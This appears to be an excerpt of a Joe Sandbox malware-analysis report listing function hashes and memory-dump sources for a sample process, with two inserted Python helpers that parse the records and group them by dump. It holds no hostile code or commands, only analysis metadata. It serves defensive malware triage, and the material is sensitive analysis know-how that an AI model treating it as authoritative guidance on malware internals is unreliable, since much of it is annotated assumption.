                                                                                                                                                                                                                                                                    • String ID: A67H
                                                                                                                                                                                                                                                                    • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                    • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                    • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: [
                                                                                                                                                                                                                                                                    • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                    • Instruction ID: 3ba1abbb005ae7d47fef9b25955e9e631f09e9f174ff1680e564550c5f84974b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD020075600702CBCB24CF29C8E1663B7F2FFA9714B19859DC4864FBA5EB39A452CB50
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ,)*k
                                                                                                                                                                                                                                                                    • API String ID: 0-1228391949
• Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction ID: 9832939cc0ca6e4005c5657630c66589d1309634df904c298b50862bafd67e39
• Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction Fuzzy Hash: 04C1687DA083105BD364DF29C880A3FFBEAABC6714F29992EE58157780D7319C40CB82
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
• Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
• Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
• Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
• Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
• Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
• Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
• Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
• Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: 167H
• API String ID: 0-2704650348
• Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
• Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
• Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
• Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
• Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
• Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
• Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
• Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: 167H
• API String ID: 2994545307-2704650348
• Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
• Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
• Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
• Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
• Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
• Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
• Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
• Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: &#
• API String ID: 0-1789715784
• Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
• Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
• Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
• Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
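The function records above come from two memory regions of process 3: the image mapped at 0x00400000 (based on PE: true) and the region at 0x02490000 (based on PE: false), and each carries an Opcode Fuzzy Hash and an Instruction Fuzzy Hash. A question an analyst usually wants answered from such a listing is whether the non-PE region holds the same code as the mapped image, which is what the report's unpacking signatures suggest. The Python helper below is an added example; it is not part of the Joe Sandbox report or of its IDA plugin. It parses records in the report's "• Key: value" format and pairs records from different dump offsets whose instruction fuzzy hashes agree. The similarity metric it uses, positional agreement of hex nibbles, is an assumption chosen for illustration; it is not how Joe Sandbox computes its own Similarity section. The embedded sample is constructed from four of the records listed above, reduced to the fields the helper needs.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: four records from the report above, trimmed to the
# lines this helper needs. The parser keeps any "• Key: value" line it sees,
# so full records with Instruction ID, API String ID etc. parse the same way.
SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
• Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
• Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitializeThunk
• Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
• Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
• Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
"""

# "• Key: value" with an optional bullet; the key is everything up to the first colon.
FIELD = re.compile(r"^\s*[•*-]?\s*([A-Za-z][A-Za-z ]+?):\s*(.*?)\s*$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def parse_records(text: str) -> List[Dict[str, object]]:
    """One dict per function record.

    A record starts at a "Memory Dump Source" line; every following
    "• Key: value" line is stored under Key until the next record starts.
    The dump offset and the "based on PE" flag are lifted out of Source File.
    """
    records: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        current[key] = value
        if key == "Source File":
            om = OFFSET.search(value)
            current["dump_offset"] = int(om.group(1), 16) if om else None
            current["based_on_pe"] = "based on PE: true" in value
    return records


def nibble_agreement(a: str, b: str) -> float:
    """Fraction of positions on which two equal-length hex hashes agree.

    Assumed metric for illustration only; the report does not document how
    Joe Sandbox derives the scores in its Similarity section.
    """
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


def cross_dump_matches(records: List[Dict[str, object]],
                       threshold: float = 0.7) -> List[Tuple[str, str, float]]:
    """Pairs of records from different dump offsets whose Instruction Fuzzy
    Hashes agree on at least `threshold` of their nibbles, best first."""
    usable = [r for r in records
              if r.get("Instruction Fuzzy Hash") and r.get("dump_offset") is not None]
    out: List[Tuple[str, str, float]] = []
    for i, a in enumerate(usable):
        for b in usable[i + 1:]:
            if a["dump_offset"] == b["dump_offset"]:
                continue  # same region: not evidence of unpacked code
            score = nibble_agreement(str(a["Instruction Fuzzy Hash"]),
                                     str(b["Instruction Fuzzy Hash"]))
            if score >= threshold:
                out.append((str(a.get("Opcode ID", "?")),
                            str(b.get("Opcode ID", "?")), round(score, 3)))
    return sorted(out, key=lambda t: -t[2])


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for a, b, s in cross_dump_matches(recs):
        print(f"{s:.3f}  {a[:12]}  ~  {b[:12]}")
```

On the sample, only one pair clears the 0.7 threshold: the 0x02490000 function with Opcode ID 2c1d9dc0… and the 0x00400000 function with Opcode ID 8f11379e…, whose instruction hashes agree on 55 of 70 nibbles. The other cross-region pairs score well under 0.6, so the threshold separates a real counterpart from unrelated functions on this data; on a full listing, tune it against known-identical functions before trusting it.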
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: &#
• API String ID: 0-1789715784
• Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                    • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                    • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                    • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: de
                                                                                                                                                                                                                                                                    • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                    • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                    • Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                    • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                    • Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                    • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                    • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: RpB
                                                                                                                                                                                                                                                                    • API String ID: 0-664042118
                                                                                                                                                                                                                                                                    • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                    • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: d1
                                                                                                                                                                                                                                                                    • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                    • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                    • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
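The entries above come from two different memory dumps of process 3: the loaded image at 0x00400000 (marked "based on PE: true") and a region at 0x02490000 that the analyzer marks "based on PE: false", i.e. executable code that belongs to no loaded module. When triaging a report this long it helps to regroup the function entries by dump rather than reading them one by one. The following is an added example written for this page, not Joe Sandbox's own code: it parses field lines in the layout shown here, decodes the dot-separated .sdmp file name, and groups functions and string IDs per dump. The sample input is constructed from four entries on this page. Two assumptions are labelled in the code: that a new entry starts at each "Strings" heading, and that the fifth hex field of the .sdmp name is the Windows page protection (0x40 is the documented value of PAGE_EXECUTE_READWRITE; the fourth field is taken as the region base because it equals the "Offset" printed beside it).

```python
import re
from collections import defaultdict

# Documented Windows PAGE_* protection constants. Treating the fifth field of an
# .sdmp name as that protection value is an assumption made for this example.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# Constructed sample: four entries copied from this page, reduced to the fields used here.
SAMPLE = """\
Strings
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• String ID: .
• Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
Strings
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• String ID: de
• Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
Strings
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• String ID: ~
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
Strings
• Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• String ID: ~
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
"""

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SOURCE_RE = re.compile(
    r"^(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_entries(text):
    """One dict per function entry. Assumption: each entry starts at a 'Strings' heading."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "Strings":
            current = {}
            entries.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group("key").strip()] = m.group("val").strip()
    return entries


def parse_dump_name(name):
    """Decode the eight dot-separated hex fields of an .sdmp file name.

    Field 1 is taken as the PID and field 4 as the region base (it equals the
    'Offset' printed beside it on the page); field 5 as protection is assumed.
    """
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name layout: {name}")
    prot = int(fields[4], 16)
    return {
        "pid": int(fields[0], 16),
        "base": int(fields[3], 16),
        "protection": PAGE_PROTECTION.get(prot, f"0x{prot:x}"),
    }


def summarize_by_dump(entries):
    """Group entries by memory dump and collect the functions and strings each holds."""
    dumps = {}
    for e in entries:
        src = SOURCE_RE.match(e.get("Source File", ""))
        if not src:
            continue
        name = src.group("name")
        dump = dumps.setdefault(name, {
            **parse_dump_name(name),
            "pe_backed": src.group("pe") == "true",
            "functions": set(),
            "strings": set(),
        })
        # Consistency check: the Offset printed on the page must equal the base in the name.
        if int(src.group("offset"), 16) != dump["base"]:
            raise ValueError(f"offset mismatch for {name}")
        dump["functions"].add(e["Opcode ID"])
        dump["strings"].add(e["String ID"])
    return dumps


def strings_shared_across_dumps(dumps):
    """String IDs referenced by code in more than one dump (e.g. PE-backed and not)."""
    seen = defaultdict(set)
    for name, dump in dumps.items():
        for s in dump["strings"]:
            seen[s].add(name)
    return {s: sorted(names) for s, names in seen.items() if len(names) > 1}


if __name__ == "__main__":
    for name, d in summarize_by_dump(parse_entries(SAMPLE)).items():
        print(f"pid {d['pid']} base 0x{d['base']:x} {d['protection']} "
              f"pe_backed={d['pe_backed']} functions={len(d['functions'])}")
```

Run against the full report text instead of SAMPLE, the same grouping tells you how many of the listed functions live in the image at 0x00400000 versus the unbacked region at 0x02490000, and which string IDs (here "~") are referenced from both; the offset check catches a copy of the report in which the Offset column and the dump name disagree.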
Strings
Memory Dump Source
• Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
• Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
• Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                                    • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                    • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                    • Instruction ID: 6b8f5fe0cc72ad51f6b5591bbed2a957451959d292013d7bf185c2e6d6f1656a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3881B178A05201DFD754DF2CC880A6BB7E2EF99714F29953DE5858B3A1DB31E841CB42
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
